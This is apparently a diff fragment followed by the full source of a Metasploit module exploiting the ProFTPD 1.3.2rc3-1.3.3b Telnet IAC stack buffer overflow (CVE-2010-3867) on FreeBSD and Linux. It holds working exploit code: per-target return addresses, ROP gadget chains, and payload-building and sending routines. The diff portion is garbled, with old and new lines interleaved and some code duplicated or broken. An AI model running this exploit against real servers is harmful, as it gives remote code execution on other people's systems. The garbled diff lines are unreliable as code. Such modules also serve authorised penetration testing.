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@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow',
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'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)',
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'Description' => %q{
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This module exploits a stack-based buffer overflow in versions of ProFTPD
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server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
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@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
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# NOTE: \xff's need to be doubled (per ftp/telnet stuff)
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'BadChars' => "\x00\x0a\x0d",
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'DisableNops' => 'True',
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'StackAdjustment' => -1500
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'PrependEncoder' => "\x83\xec\x7f", # sub esp,0x7f (fix esp)
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},
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'Platform' => [ 'bsd' ],
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'Targets' =>
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[ 'Automatic Targeting', { 'auto' => true } ],
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#
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# specific targets
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# This special one comes first since we dont want its index changing.
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#
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[ 'ProFTPD 1.3.2a Server (FreeBSD 8.0)',
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[ 'Debug',
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{
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'Offset' => 15,
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'Ret' => 0xbfbfeac4,
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'Readable' => 0xbfbfbfbf,
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'IACCount' => 8192, # should cause crash writing off end of stack
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'Offset' => 0,
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'Ret' => 0x41414242,
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'Writable' => 0x43434545
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}
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],
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#
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# this one will detect the parameters automagicly
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# specific targets
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#
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[ 'Debug',
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[ 'ProFTPD 1.3.2a Server (FreeBSD 8.0)',
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{
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'Offset' => -1,
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'Writable' => 0x41414242, #
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'FlowHook' => 0x43434545 #
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'IACCount' => 1024,
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'Offset' => 0x414,
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'Ret' => 0xbfbfeac4,
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'Writable' => 0x80e64a4,
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}
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],
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],
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'DefaultTarget' => 0,
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'DisclosureDate' => 'Nov 1 2010'))
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end
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print_status("Selected Target: #{mytarget.name}")
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pl = exploit_regenerate_payload(mytarget.platform, arch)
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if not pl
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raise RuntimeError, 'Unable to regenerate payload!'
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end
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else
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print_status("Trying target #{mytarget.name}...")
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if banner
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print_status("FTP Banner: #{banner.strip}")
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end
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pl = payload
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end
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#puts "attach and press any key"; bleh = $stdin.gets
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puts "attach and press any key"; bleh = $stdin.gets
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buf = ''
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buf << 'SITE '
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buf << "\xff" * 1024
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buf << rand_text_alphanumeric(mytarget['Offset'])
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# NOTE: buf must be odd-lengthed prior to here.
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buf << "\xff" * mytarget['IACCount']
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buf << rand_text_alphanumeric(mytarget['Offset'] - buf.length)
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buf << [
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mytarget['Ret'],
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mytarget['Readable']
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].pack('VV')
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#buf << "\xcc"
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buf << payload.encoded #.gsub("\xff", "\xff\xff")
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mytarget['Writable']
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].pack('V*')
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buf << payload.encoded
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buf << "\r\n"
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sock.put(buf)
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##
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# $Id$
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##
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##
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# This file is part of the Metasploit Framework and may be subject to
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# redistribution and commercial restrictions. Please see the Metasploit
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# Framework web site for more information on licensing and terms of use.
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# http://metasploit.com/framework/
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##
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require 'msf/core'
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class Metasploit3 < Msf::Exploit::Remote
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Rank = GreatRanking
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include Msf::Exploit::Remote::Ftp
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)',
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'Description' => %q{
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This module exploits a stack-based buffer overflow in versions of ProFTPD
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server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
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large number of Telnet IAC commands, an attacker can corrupt memory and
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execute arbitrary code.
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This version of the exploit uses a little ROP stub to indirectly transfer the
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flow of execution to a pool buffer (the cmd_rec "res" in "pr_cmd_read").
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NOTE: Most Linux distributions either do not ship a vulnerable version of
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ProFTPD, or they ship a version compiled with stack smashing protection. As of
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this writing, SSP is believed to successfully mitigate this vulnerability.
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},
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'Author' => [ 'jduck' ],
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'Version' => '$Revision$',
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'References' =>
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[
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['CVE', '2010-3867'],
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['OSVDB', '68985'],
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['BID', '44562']
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],
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'DefaultOptions' =>
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{
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'EXITFUNC' => 'process',
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'PrependChrootBreak' => true
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},
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'Privileged' => true,
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'Payload' =>
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{
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'Space' => 4096,
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# NOTE: \xff are avoided here so we can control the number of them being sent.
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'BadChars' => "\x00\x0a\x0d\xff",
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'DisableNops' => 'True',
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},
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'Platform' => [ 'linux', ],
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'Targets' =>
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[
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#
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# Automatic targeting via fingerprinting
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#
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[ 'Automatic Targeting', { 'auto' => true } ],
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#
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# This special one comes first since we dont want its index changing.
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#
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[ 'Debug',
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{
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'IACCount' => 8192, # should cause crash writing off end of stack
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'Offset' => 0,
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'Ret' => 0x41414242,
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'Writable' => 0x43434545
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}
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],
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#
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# specific targets
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#
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[ 'ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1',
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{
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'IACCount' => 4096+16,
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'Offset' => 0x102c-4,
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# NOTE: All addresses are from the proftpd binary
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'Ret' => 0x80c44c4, # pop esi / pop ebp / ret
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'Writable' => 0x80d81a0, # .data
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'RopStack' =>
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[
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# Writable is here
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0xcccccccc, # unused
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0x80c44c2, # mov eax,esi / pop esi / pop ebp / ret
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0xcccccccc, # unused
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0xcccccccc, # unused
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# quadruple deref the res pointer :)
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0x8068886, # mov eax,[eax] / ret
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0x8068886, # mov eax,[eax] / ret
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0x8068886, # mov eax,[eax] / ret
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0x8068886, # mov eax,[eax] / ret
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# skip the pool chunk header
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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0x805bd8e, # inc eax / adc cl, cl / ret
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# execute the data :)
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0x0805c26c, # jmp eax
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],
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}
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],
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# For the version compiled with symbols :)
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[ 'ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)',
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{
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'IACCount' => 4096+16,
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'Offset' => 0x1028-4,
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# NOTE: All addresses are from the proftpd binary
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'Writable' => 0x80ec570, # .data
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'Ret' => 0x80d78c2, # pop esi / pop ebp / ret
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'RopStack' =>
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[
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# Writable is here
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#0x0808162a, # jmp esp (works w/esp fixup)
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0xcccccccc, # unused (becomes ebp)
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0x80d78c2, # mov eax,esi / pop esi / pop ebp / ret
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0xcccccccc, # unused (becomes esi)
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0xcccccccc, # unused (becomes ebp)
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# quadruple deref the res pointer :)
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0x806a915, # mov eax,[eax] / pop ebp / ret
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0xcccccccc, # unused (becomes ebp)
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0x806a915, # mov eax,[eax] / pop ebp / ret
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0xcccccccc, # unused (becomes ebp)
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0x806a915, # mov eax,[eax] / pop ebp / ret
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0xcccccccc, # unused (becomes ebp)
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0x806a915, # mov eax,[eax] / pop ebp / ret
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0xcccccccc, # unused (becomes ebp)
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# skip the pool chunk header
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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0x805d6a9, # inc eax / adc cl, cl / ret
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# execute the data :)
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0x08058de6, # jmp eax
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],
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}
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],
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],
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'DefaultTarget' => 0,
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'DisclosureDate' => 'Nov 1 2010'))
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register_options(
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[
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Opt::RPORT(21),
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], self.class )
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end
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def check
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# NOTE: We don't care if the login failed here...
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ret = connect
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# We just want the banner to check against our targets..
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print_status("FTP Banner: #{banner.strip}")
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status = CheckCode::Safe
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if banner =~ /ProFTPD (1\.3\.[23][^ ])/i
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ver = $1
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maj,min,rel = ver.split('.')
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relv = rel.slice!(0,1)
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case relv
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when '2'
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if rel.length > 0
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if rel[0,2] == 'rc'
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if rel[2,rel.length].to_i >= 3
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status = CheckCode::Vulnerable
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end
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else
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status = CheckCode::Vulnerable
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end
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end
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when '3'
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# 1.3.3+ defaults to vulnerable (until >= 1.3.3c)
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status = CheckCode::Vulnerable
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if rel.length > 0
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if rel[0,2] != 'rc' and rel[0,1] > 'b'
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status = CheckCode::Safe
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end
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end
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end
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end
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disconnect
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return status
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end
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def exploit
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connect
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# Use a copy of the target
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mytarget = target
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if (target['auto'])
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mytarget = nil
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print_status("Automatically detecting the target...")
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if (banner and (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))) then
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print_status("FTP Banner: #{banner.strip}")
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version = m[1]
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else
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print_status("No matching target")
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return
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end
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regexp = Regexp.escape(version)
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self.targets.each do |t|
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if (t.name =~ /#{regexp}/) then
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mytarget = t
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break
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end
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end
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if (not mytarget)
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print_status("No matching target")
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return
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end
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print_status("Selected Target: #{mytarget.name}")
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else
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print_status("Trying target #{mytarget.name}...")
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if banner
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print_status("FTP Banner: #{banner.strip}")
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end
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end
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#puts "attach and press any key"; bleh = $stdin.gets
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buf = ''
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buf << 'SITE '
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buf << payload.encoded
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# The number of characters left must be odd at this point.
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buf << rand_text(1) if (buf.length % 2) == 0
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buf << "\xff" * (mytarget['IACCount'] - payload.encoded.length)
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buf << rand_text_alphanumeric(mytarget['Offset'] - buf.length)
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buf << [
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mytarget['Ret'],
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mytarget['Writable']
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].pack('V*')
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if mytarget['RopStack']
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buf << mytarget['RopStack'].map { |e|
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if e == 0xcccccccc
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rand_text(4).unpack('V').first
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else
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e
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end
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e
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}.pack('V*')
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end
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buf << "\r\n"
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sock.put(buf)
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disconnect
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print_status("Your payload should have executed now...")
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handler
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end
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end
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